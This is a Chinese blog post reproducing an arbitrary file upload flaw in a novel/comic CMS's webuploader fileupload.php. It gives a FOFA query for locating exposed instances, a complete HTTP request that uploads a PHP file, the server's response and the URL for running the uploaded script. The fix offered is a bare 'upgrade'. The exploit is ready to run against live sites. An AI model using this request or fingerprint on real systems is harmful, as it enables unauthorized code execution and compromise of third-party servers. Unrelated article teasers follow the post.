小说漫画系统 fileupload.php 任意文件上传漏洞复现

devtools/2024/10/18 15:38:59/

FOFA搜索语句

"/Public/home/mhjs/jquery.js"

漏洞复现 

1.向靶场发送如下数据包

POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/2
Host: xxx.xxx.xx.xx
Cookie: PHPSESSID=54bc7gac1mgk0l3nm8cv6sek07; uloginid=677742617
Cache-Control: max-age=0
Sec-Ch-Ua: 
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 209------WebKitFormBoundaryqvlfcogulumndzorContent-Disposition: form-data; name="file"; filename="fpgemjsu.php"Content-Type: image/jpeg
<?php phpinfo();unlink(__FILE__);?>------WebKitFormBoundaryqvlfcogulumndzor

响应内容如下

HTTP/2 200 OK
Server: nginx
Date: Sun, 13 Oct 2024 08:55:28 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 13 Oct 2024 08:55:28 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Strict-Transport-Security: max-age=31536000{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

 

2.访问回显文件

Public/webuploader/0.1.5/server/upload/fpgemjsu.php

 

修复建议

升级到最新版本。

作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。


http://www.ppmy.cn/devtools/125654.html

相关文章

在 Ubuntu 下通过 Docker 部署 FTP 服务器

今天我在阿贝云的免费服务器上进行部署测试&#xff0c;体验非常不错&#xff01;阿贝云提供的免费云服务器配置为 1 核 CPU、1G 内存、10G 硬盘和 5M 带宽&#xff0c;真是一个不错的免费服务器&#xff0c;让我轻松实现了自己的项目需求。无论是灵活性还是性能&#xff0c;阿…

单体到微服务架构服务演化过程

单体到微服务架构服务演化过程 架构服务化 聊聊从单体到微服务架构服务演化过程 单体分层架构 在 Web 应用程序发展的早期&#xff0c;大部分工程是将所有的服务端功能模块打包到单个巨石型&#xff08;Monolith&#xff09;应用中&#xff0c;譬如很多企业的 Java 应用程序…

开源 AI 智能名片 O2O 商城小程序源码助力企业实现三层式个性化体验

摘要&#xff1a;本文探讨了在数字化时代&#xff0c;企业如何利用开源 AI 智能名片 O2O 商城小程序源码实现三层式个性化体验。通过分析数字化空间的定制化和个性化服务特点&#xff0c;以及实体经营中对人际互动的依赖&#xff0c;阐述了随着物联网和人工智能基础设施的开发&…

Web Socket 使用详解

在信息爆炸的时代&#xff0c;用户对网页的期待早已超越了静态内容的展示。实时聊天、股票报价、协同编辑等功能的实现&#xff0c;都离不开服务器与客户端之间持续、高效的数据交互。传统的HTTP请求-响应模型难以满足这种需求&#xff0c;而WebSocket的出现&#xff0c;为构建…

Excel:将一列拆分成多列

实现的效果是&#xff1a; 操作步骤如下&#xff1a; 1.选中列 → 点击菜单栏中的"数据" → 分列 2.选择"分列符号"&#xff0c;点击下一步 3.我想要按照空格分列&#xff0c;就选择空格 4.点击完成&#xff0c;就可以实现分列的效果了

ESP32驱动WS2812

WS2812是一种可编程的LED灯&#xff0c;使用RGB三个通道&#xff0c;可以显示2^24种颜色&#xff0c;而且自带控制芯片&#xff0c;便于控制。数据从DIN进入第一个灯珠时&#xff0c;第一个灯珠会锁存第一个24位数据&#xff0c;然后剩下的数据会从灯珠DOUT引脚输出到下一个灯珠…

NoSQL

在WEB 2.0的“三高”需求面前 1) 对数据库高并发读写的需求 2) 对海量数据的高效率存储和访问的需求 3) 对数据库的高可扩展性和高可用性的需求 传统的关系数据库遇到了难以克服的困难&#xff0c;为了解决这些问题&#xff0c;非关系行数据库应运而生。 1.相关理论基础 1.…

JAVA开源项目 渔具租赁系统 计算机毕业设计

本文项目编号 T 005 &#xff0c;文末自助获取源码 \color{red}{T005&#xff0c;文末自助获取源码} T005&#xff0c;文末自助获取源码 目录 一、系统介绍二、演示录屏三、启动教程四、功能截图五、文案资料5.1 选题背景5.2 国内外研究现状5.3 可行性分析 六、核心代码6.1 渔…